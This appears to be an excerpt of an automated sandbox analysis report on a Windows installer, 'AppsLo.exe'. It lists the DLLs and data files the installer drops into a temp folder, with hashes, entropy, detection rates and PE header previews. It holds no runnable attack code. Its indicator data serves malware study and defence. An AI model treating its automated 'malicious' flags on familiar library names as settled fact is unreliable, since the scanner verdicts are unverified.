SHA-256:	E6BF47FDA379E8F5E88EA2DE2516A0F029AAAE8A2A2B856BD4BEB6497DBF34E0
SHA-512:	73874A8120653D1A81416D8F573D8765481EE72957E2ACECC689DAE9864FAEEA62AEF87B4C169E6FA6850629EC46088E9F13C0C47E42922E9524921725506843
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".A.m.a.t.o.l.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.4.c.e.1.f.d.3.2.-.1.a.9.f.-.4.b.a.7.-.a.a.e.e.-.4.a.4.0.6.3.0.a.8.a.d.3.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.A.8.B.B.2.6.C.9.-.8.9.F.3.-.4.2.4.1.-.8.D.B.7.-.7.2.4.7.6.9.1.C.F.D.0.D.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".H.a.l.f.p.l.a.t.e.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".W.i.X. .T.o.o.l.s.e.t. .v.3...1.1. .N.a.t.i.v.e. .2.0.1.5. .S.D.K.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".1.5.1.6.1.1.". .P.a.c.k.a.g.e.S.i.z.e.=.".1.5.1.6.1.

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\Trombone.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	585728
Entropy (8bit):	6.709566691910362
Encrypted:	false
SSDEEP:	12288:BBC1h1qr18wDb0EUmmo5h36tgjtYQCidIH:zC1h1qrmQb0EUmmom0tT3di
MD5:	5412CF1EEE15EE07D4E23CB377004DA0
SHA1:	AC763AAD17ECDAA18C02EF0A84BC9A33B3FD467C
SHA-256:	1E9721E45B123A884960530A0D7A7D9663FD551146DDBDBEE990FE185633BA47
SHA-512:	C5B960EDF3794582FFD4E915D9AB1F399AC905684D19F9DED0E61A0AAC907CF37B5459A2B42365FDE027646141378784DF71DD90DC716F272BF1480821C58BEB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y^p`.?.3.?.3.?.3.G.3.?.3.G.3.?.3.G.3.?.3.?.3.?.3.G.3.?.3.G.3.?.3.G.3.?.3.G.3.?.3Rich.?.3........PE..L....3.N...........!.....p...................................................P......................................P?...B...-..x.......x.......................$?......................................@...............8............................text...$n.......p.................. ..`.rdata...............t..............@..@.data....P.......&...v..............@....rsrc...x...........................@..@.reloc...M.......N..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\js3250.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	458848
Entropy (8bit):	6.755005117484388
Encrypted:	false
SSDEEP:	12288:uRS9bzEY9IiJ3GLL8XoscqSgjZa1AJA+zGx:GStzEY9IiJIL84sjSkamJA+zG
MD5:	7C4A1822055BF598F35D72E0EC98F429
SHA1:	2279A6D8E207E03C4C771D8517DD36C037F81FBF
SHA-256:	34B3343A8E21AE1DD96099EB63FD06C715F221CBF5A4A34018EEC1B344A8674F
SHA-512:	0DB43EE062436B1D4172B6E8ADDA499966A5443037F9E8AA378ABCB52A86C3FA01F0F090DCAA14D0810289E39A390E9848475A2FAF04B6776CEAF7D3A8A8ACD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3...3...3....c..5...\`..7...\`..1...Q`..1...3...w...g\.......y..2...._..7...Rich3...........................PE..L....[?I...........!...............................`......................... ......................................p9...6...4..P...................h...........d-.. ................................................................................text............................... ..`.rdata..t...........................@..@.data....`...p...`...V..............@....rsrc...............................@..@.reloc...........0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\noubls

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	data
Category:	dropped
Size (bytes):	21484
Entropy (8bit):	5.437098621647359
Encrypted:	false
SSDEEP:	384:kZAr47zFtbfHSjzxbMJRQDWNEMC93P/noUmuU7hfSxSdebTKBoTO:uy47zFtbfH2zmJSnoFNJSxSGTKmTO
MD5:	DE2E079B3B6C1DE36B164CE9252CCD2C
SHA1:	0811083BBA474AF86A0BE738509FBD26A233F685
SHA-256:	74A3206A31AA53921C4A6234264515094829BFD12CC6FD15449F3E53129ECCE6
SHA-512:	4C93D07EB4D69CB643F261178A3BE5FFABA7EC8291EFAC73506C27491F63274FD237C0A21C39C308647822B57379B02895CF7BF4DEAA57365E78B0D370F01AF1
Malicious:	false
Preview:	.y`gvM.....y.Y..Bi..eF^......RiaWsa.k._...K......C...W.gD.f..Z.i.....l....sVB..P`.A.l.NTx......iK.\mS........MZ...[..._.Y.C..QZ.Rn.i..n.Z`._.GABhZ^....xMe^y..XCL_........Jx.BZ.bbCu..XJtK..qt.[_.VVbZ.jsh.R.I...._B`..Xw..._N....Nekr.erX....LG..jT.l.j.W.Nk.gE.Hh.mf.`....]B..\.`tf.E`fnn....Eiue.V.[Y\.._r.c...h.uO.MC^q........K.uP..Piq.aR.n..wqKbAkmREvVIq...oUBtU.....Ll..HE.Py.m.Xi..X..Vs^.X..rl...AQQQ..F....Av.Nhe..k..a.XK.m........p...s.j..qT...YatVR.suKcX..._Z.Qj.b^V..kAj.[dKh.a.N...XuM].....x.dMvR.X..]..up..U..n.uaXc......gAU...kK.K.Z]VVVU.wi...UaIfxM.Xt.Z[.bSUw_g....]r.vtFV..]R.^.t......gY`.Jq\e.Jw.....v..oQH....\.P.e.....B.\P.d.Q.k.jftj......x.n.b.Ah.[.UyMt.N].].as..u...d...a_p.Pm..XoV..Bo.....y.B....eoH.i.`Q.f.K[rHQD.F.`Ug....W...w......byg.K....Go..[o.t..e..JXj...bSO.uMR..A....x..Z...bHv..P]j.].......KI.jq..yPN..YHZ.oM..l..o..Pr.j.BO.`Jy..lN..d..g..p...O.SSu.MB[.`.Q.hd.vU...c.Pi..\RH.s..L`....]..R.]a..NP...ehD..ig\Iqd.SaZn.d.u.HmgFy.c.Q...yLI...ncsR..Gap...F.....nrY..L.vr...L...l.r.

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldap32v50.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	145032
Entropy (8bit):	6.223296464610944
Encrypted:	false
SSDEEP:	3072:aRQRTpMrhZ3qPKnWK62E181dYZFqNpkIkwn:aiRTpMd0Si2d6FOkIk
MD5:	7081AF61B5B48EE3709FFE2996B3362C
SHA1:	69EDA947CEE9426C59683D867954A3DDFA44CC53
SHA-256:	9F3EBED578B7B58C488CD601770C0CD5346D029DB8451425CC2CE8546897F107
SHA-512:	C4E3592048DC41482F4E8F57993EF5328461C476245F125D3470B64EF8A652466BD2C12AE53E2DC9AC94A9A1C77D08F01988AC1622C2C00A28C0DB35E86519CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..ZS..ZS..ZS..!O..XS...O..[S..5L..^S..5L..XS..ZS..cS..8L..YS...p..`S..s..[S..RichZS..........................PE..L....[?I...........!.........p......A..............`.........................0.......A..................................i%......<.................... ....... .......................................................................................text.............................. ..`.rdata..9=.......@..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nsldappr32v50.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30344
Entropy (8bit):	3.9528812148205814
Encrypted:	false
SSDEEP:	192:68TPhk5fVC15iPnyu2rqr3NBW37AI6i3wFVUrBvCzW0BEyncjWOeyowJL/te9Xxu:xTP8fVC783vW3bwQDinNYJLtI
MD5:	B8019E6A4DCF1037AB4FB3EA74FFF91D
SHA1:	BA12B694467BB3979BD3FAEAB8698AA631C1276B
SHA-256:	8377A1BABBDB38611C7BBBAF05AC5108C1C6539104B160CB1DBFCBB7638F3AE8
SHA-512:	F60E79E01C8435EF7AB60AB2D5A38142AD3F3F32139DD77BC6CE877B84B9721077CAA39B868774842639058218740644BB897BE02720E5D2CC7B0F8707FD4FFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................x.......Rich............PE..L....[?I...........!..... ...0......g#.......0.....`.........................`.......................................4..@....0..d....................`.......P.......0...............................................0...............................text...*........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....reloc..\|....P.......P..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nspr4.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	161384
Entropy (8bit):	6.486424042107867
Encrypted:	false
SSDEEP:	3072:nt3Y4Gn/cq5IFL+UaxFw2TRvRE1kayxLutLwn2bHcnn4:NYfnheSUaxFPpREWxLuw+
MD5:	312DC77A5D170D38F3D88873181FCC0E
SHA1:	E667573218122C9029DF41ACE48C709ACB5CC5E4
SHA-256:	9018EB816FD4931CFD46793DF9ED4DEDB0184566E7B8AEE39DDE542B4879CB00
SHA-512:	4CA9B816B47C99ADC3D018BAC67612892B4EFAC327E55198245CE202A6BD3BE0F9E11342337AE2533B9462CC1E877568BAA319DFEE9B807AB99808D7B09A15FE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.mk..mk..mk..qg..mk..qe..mk..ra..mk..ro..mk..mj.!mk..rx..mk..N[..mk.Nkm..mk.vMo..mk.Rich.mk.................PE..L....[?I...........!..............................`.........................p......)i..............................`....*......x....@..............p`.......P.......................................................................................text............................... ..`.rdata..6j.......p..................@..@.data...\|.... ....... ..............@....rsrc........@.......0..............@..@.reloc.......P... ...@..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\nss3.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	382560
Entropy (8bit):	6.396537438640733
Encrypted:	false
SSDEEP:	6144:Z9bwkDptQVYLyvKKp7AfrVz8lzispR55+/kBLtH7m2R2Kk+XknIUkJuiC3Rl6+/b:Z9bwkDptQVYLyxp7AfrVz8NispRCcbpe
MD5:	0E845C5A84427B1AF9B577C122BC4E23
SHA1:	43AFE65E3AA16C5981B30E6D896F7ED74BE545AE
SHA-256:	F9E1F2A9A88A5D5CA748A84784D56A65D5E611785AA1D3638C07E9B36624BC73
SHA-512:	8C3A9AD7E90E09A53207A287ADF0D283AEB246F4EF4586C3B19C219FDB7614D79B7B15560F1AC5A5D34E918B6595BCB932C8FC96BD1D20FE24CEDC218BF695E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................).............................m.....U.....Rich...........PE..L....[?I...........!.....0..........;2.......@.....`................................................................p................... ...........h...........l....A...............................................@...............................text....#.......0.................. ..`.rdata.......@.......@..............@..@.data....2...@...@...@..............@....rsrc... ...........................@..@.reloc...".......0..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plc4.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34416
Entropy (8bit):	4.0883403433771806
Encrypted:	false
SSDEEP:	384:MPIxljxCHKnD4PFfxAyOkdyLO6wrgPenNYJLtIT/:M0pnCxgwrgPen4LE
MD5:	9ED02E151C4F5417C10594A19EEEB034
SHA1:	139F6DAA64D1ABC84B48A00CC25049190E338AC0
SHA-256:	FA4BEBED44856339E1D65A670ECBCE8487EC95851B1CF278D40B442E5E118F71
SHA-512:	DA8EA86529BBC407C033DE56C940E6305661167021BF79F893DE232A1ED7C54A294E71FE8FC629767FE9FC0686CD2B30AFD84BF3EEE0415AAA604C8D2CCDE8D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[...:..:..:.%...:.%..:.%..:..:..:....:.,<..:.....:.Rich.:.........PE..L....[?I...........!..... ...@......{!.......0....)`.........................p.......................................;......$:..P....P..............xp.......`..`...`0...............................................0..T............................text...>........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....rsrc........P.......P..............@..@.reloc.......`.......`..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\plds4.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30312
Entropy (8bit):	3.4254270167584915
Encrypted:	false
SSDEEP:	192:HGaz0KM7Timc4W7uW6cbpXchb+i4BDYFr0ZYyFB+iEyncjWOeyowJL/te9Xx5gOq:HL0KMTi1bigi4BDIr0iyFBNnNYJLtIq
MD5:	5D35EE582ED616947ADE1002F25682CA
SHA1:	70B8862DA9ED370C78F82218251BD40E32C5514A
SHA-256:	ED79346AF0BD7276039E011D72B7C817E2015EDDF91224E08DAF3B2A041CA5AD
SHA-512:	E3B011BD68919E4E8BB664426249F774BF1291434242F5E258D05134CA4C13C27EBDF46C5909D1F3B68731D68F936CACF18A5F9A1397E0A7C8819E2B1A19CADD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'4.XcU..cU..cU...J..aU...J..fU...J..aU..cU..lU..7v..`U...S..bU...u..gU..RichcU..................PE..L....[?I...........!.........@......;........ ....*`.........................`......................................p".......!..P....@..............p`.......P......@ ............................................... ..@............................text............................... ..`.rdata..S.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\smime3.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112224
Entropy (8bit):	5.8935265370850285
Encrypted:	false
SSDEEP:	3072:aHg/reLDq+TdOcQCRcNW+8ilKocmFwSsZGloIYKNloFrYnW:aOyl5OMcNW+hMWup
MD5:	05FF877978A22599F8675344AFF7E9AC
SHA1:	F4E083FBD2442B0D1C9FE107DC7370E5E47BFCB7
SHA-256:	B8F3022392E3BD755B4D3BAE4011303EEA6ACAF5369AE987F33F654A30AEB5C2
SHA-512:	56105DBA4DEABBC2D1F2DE5D38182C71DD197DC32AADADFCE4E8C40E1EABB2E7280BAA60A635D42E71986E962905D24BE0FF4D14E02CC328F7053AA06BBC593B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.]#...#...#...A...!...L...&...L...!...#......w.........."......+...Rich#...........PE..L....[?I...........!......................... ....+`.................................................................U......@>..x.......0...........h...............@#............................................... ..8............................text...T........................... ..`.rdata...M... ...P... ..............@..@.data... ....p.......p..............@....rsrc...0...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\softokn3.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254060
Entropy (8bit):	6.420458010773922
Encrypted:	false
SSDEEP:	6144:pc5eOUXOjniT9KfIx54jweoqgKwmQULxoj/idhU:pc5eOHiemOomwhqc
MD5:	DA7C7F8681BC177CC5CC1A5564BD6CE5
SHA1:	CED677CB95E289F022F62BB21D68F5FDB9EDFDD0
SHA-256:	656D3FFB58F3F75F0506595D5D818CECC59AA51DE492B21665ECAA0FF8966CE0
SHA-512:	3FDA6CA7496745A260EC82A3E4AD387AE25CFF19C950C5730F416D9EB7893032C5DC608FF25EACE223BD9F2FB95FADD7F5F7BAF32A52E30AC81BD2F37C4A4547
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N.G.N.G.N.G.Q.G.N.G.R.G.N.GfR.G.N.G.Q.G.N.G.Q.G.N.G.N.G.N.G.m.G.N.G"H.G.N.G.n.G.N.GRich.N.G........PE..L....[?I...........!..............................-`................................z...............................`k.......b..x.......0............................................................................................................text............................... ..`.rdata..\|].......`..................@..@.data...h@...p...@...p..............@....rsrc...0...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\ssl3.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	136800
Entropy (8bit):	6.05442036081695
Encrypted:	false
SSDEEP:	1536:lTvOaQ4zixRrizHmNexem0HfvpFnkkwyaDoaZBE3E5dqz+HNHFm+7zn4:JOaQ4zi78GW0/vpFn/wAE5YzmPm+7zn
MD5:	FDF29B3A596524ADCC11C6031E682E16
SHA1:	E78CCD155ADF81975A3187C6B7B98AD4A90AF594
SHA-256:	F5B17B9122EA779DA6E1C303F7D2D16096970E840A5FE072A65371FCFC9A8D34
SHA-512:	B4C1EF7A7D2E17C35AAF9D2BAB402871520AC2645B6F3AF7593FCAFFC340DC5075B16E8179A69A0513C9E4D51C5DC968E86BCCC4DBE2FACCD1D3A2A0A1315B25
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.W%..9v..9v..9v}.*v..9v..7v..9vp.3v..9vp.=v..9v..8v..9vK..v..9v..?v..9v..=v..9vRich..9v........................PE..L....[?I...........!.....p..........jt............1`....................................................................z.......x....... ...........h...............P...................................................D............................text....e.......p.................. ..`.rdata...7.......@..................@..@.data...T...........................@....rsrc... ...........................@..@.reloc..`........ ..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8504936
Entropy (8bit):	6.712907921131404
Encrypted:	false
SSDEEP:	196608:hAvt9ppoRcGBLRrgeu1kEMgHNODPzMhp0GEZhrKCwVFE1GfYJWDew3d4QeW2jscn:hAvjppoRcGBLRrgeu1kEMgHNqPzMhyGW
MD5:	A9D830B99ABEA315C465A440C4AA1B94
SHA1:	CCA605A33BA3CEFDF179CB93743A643A86518EFF
SHA-256:	815FC1B444CF92E9A7EB8BDAEAA9FF61A4FE49F88C9C691A87AD4C2A26956BC3
SHA-512:	4FE3D34DCE5D5A829F76B610EB65E60D14263901F6783BD0E2BEC76B7C6E94817CB955EB0C5AA8590AAEB3C718F9C24911C64D463E37DC14CFC4A2A4B0C63667
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?..wQ..wQ..wQ..k]..wQ.@k_..wQ..h[..wQ..hU..wQ..hB..wQ..wQ..wQ..hB..wQ..Ta..wQ..wP.2.Q..T`.aqQ..qW..wQ.<WU..wQ.Rich.wQ.........................PE..L....X?I..................c..N......H.c.......c...@..........................0.......................................ry.<_..tEx......@..0...........p.................c...............................................c..#...........................text....c.......c................. ..`.rdata........c.......c.............@..@.data....S....y.......y.............@....rsrc...0....@.....................@..@................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\uwibrk

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	data
Category:	dropped
Size (bytes):	4641689
Entropy (8bit):	7.95439482597699
Encrypted:	false
SSDEEP:	98304:m6u+UOCN1tSz2J8VrYFGGOdaq9uRaQVLPmH+uTUCOqTIom4oIo:Q+Ng1Yzm89YvOdaqElVLuHvTU5QIomJ
MD5:	7045D874EE7EF54A76503EC5C8E65F2A
SHA1:	D6F76F241E1BEAB6A34EEB26380C38BFD5BECF52
SHA-256:	08EE9C18D725B3133AA0254DCD94D220A7ECD717641C996B06748F07AF701DBF
SHA-512:	0FE934493ED2CA2712758FE460D4BC5F111D99AD45E38FD2CF53CD7794334B2A87D0F431D944907C7B3C2ECF375B2F101303D503A492A6B065C05E5A07C090E8
Malicious:	false
Preview:	.I]..w....oj.P.T.O.tt.O.._.y]I..yus..F.[Xn..b.Q.iL...a.u..I.Q..Int.k.I..q.P..P..O...JO.bq.nU.q..`Kj.rk..N[....sG..WXqL..GBh.Rw....KQ.y..S..__jT..E.FK.OD..Rhcr.RK.lSZ.hrF..Rvcg.YLrt.VssrA\i..Q.TPh..k.`..E....Hh.....^...[.....\...nw..mC....[.JNGj..e.Wj.EJNK..Q.....tc.TjCyr..Z..jt...Y.g.uy.Qc^.hQ..c]L..lAyRmA.p...bsSv.q.RM.X.X......oN......s.M..c..FRnRQyfFX.KZ.Y..SiY..m_.V.iI\.k...w..r..r.Gx...Sl..`k..QIWdO.N.dv....YK...C..`...Xb.ieY.[...wZm.`.Tc.D..KW.W.W.]....H.......Y.WJ.aU...n.q....Eu.p..].w.fLA.M....kab..Uyyj.w..JQN...w.d.......njk.f.xwUPa..l\....Mi.O.v....^o.qh.t..I....DQJo...g...T.iaJXm.K.bIoU.S.w.MW.RUXTF.T..rB....]...fhd.jc....K.....rf.Sfvj._Z.k..\u.n]fw...uy..X.R........f..S.j.....[]Eri.yN.hx...f.RySZh..p.].O...e.i.....C..fu.....FMB...Z.u\[..R.RwsS.Or.N.^..cG...B....i.ZGBJ.o.....IWxl.D.VOC.....k.[.YFE.B..bN..k.BU......f.DDf.yUw.....ZLl.......s...t.F....P.dOM.B...h.d.iAn.cb.a.oW.J.p..AN..FO..ct..`.A......p.V...........M...n.hj..bxMu..u.e...GYIb..`..mQ...J.._K.w.C.f...VTtjDKZ..._O

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_compat.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73840
Entropy (8bit):	6.756538727570579
Encrypted:	false
SSDEEP:	1536:X9W1JxRrk7xYaPxOw922ESbw030w/aUeEr32n4Q:obrSYaF2X8RaUecmn
MD5:	E9B352B512E03ED5C35D6350414B68AD
SHA1:	64CCB609EE5BB52A8DD58E95D6D56F54A7E33A49
SHA-256:	0895B8029EAB334D2AA5D31A77A975198BD71EE8D641825FCFCD178A0C5BA3D3
SHA-512:	776AC14B782AD8B9DEA952EB1AE09D799EDB5D7EA5AD7C358BCBDCD7E6C2545BE78D55467E7101E0FABF01D6668F7CA4872D57C526E2AA3F2D436A65AD85C8D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...?...#..N?...#...<...#...<...#...<...#...#...#...<...#...#..N#.......#.......#...%...#..2....#..Rich.#..........................PE..L....[?I...........!.........n....................5`.........................@..........................................oE..0........ ..............x........0..P... ................................................... ............................text............................... ..`.rdata...Y.......Z..................@..@.data...l...........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\xpcom_core.dll

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	414832
Entropy (8bit):	6.835309595385882
Encrypted:	false
SSDEEP:	12288:uOQdJEzxhYuUZzp63kZEaYswEJM2r0P3/6e5n:uOQdWEzpAcECrte5n
MD5:	CFAC67CE4389AF145FCB33D05E2E4243
SHA1:	F0F4F60717516250EDA61299615E939B1C8B0F02
SHA-256:	822C28935F9ACFFA0F894652ADC9BA344308990005B4439E36AEA4544B9B2B80
SHA-512:	6E3F45EEFDA139AA2140FE5172321A621E87866499020220135D4A6836685EF347B9DEE7FB05332B9ACC2C6A43D44F5980C5A77D0B2C8173D221B5DAD5668811
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n:..[..[..[..QG..([..G..,[..ED../[..ED..([..[...[..HD..&[..[..9Z..~x../[..~x..U[...]..+[...{.."[..Rich[..................PE..L....[?I...........!.....4...........>.......P....7`.................................D..............................P....M..h........@.......................P...:...T...............................................P..t............................text...;3.......4.................. ..`.rdata.......P.......8..............@..@.data...p'.......&..................@....rsrc........@......................@..@.reloc...?...P...@..................@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Download File

Process:	C:\Windows\Temp\AppsLo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10636628
Entropy (8bit):	7.993099184151181
Encrypted:	true
SSDEEP:	196608:sfUUhRnMReYqoWJ8O1FrYKuMdQRCbRGWj0MpQXs2eQdYwWXqEEV8MEkqISNNNtb:8LhqRevZYqaWVf2ldYB6f8/1vd
MD5:	5DEBD32329500518D4F21225DCB64E43
SHA1:	7F900A979A4B1609E79E51140129CA21B08E3F1D
SHA-256:	8918399591D6A752514DF73A9EEB9F92221C650CA28D6B1B2798F3F561A52547
SHA-512:	0B4A3C08C8715A1531B8FB384C77AD9E672856DD295843168B8E723D96D9E98AA96A50630009CF3648A8E26B6D7E02B9E96E4AB2B6632B46A9F007031205880D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@..............................................:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc....:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.9404102976707045
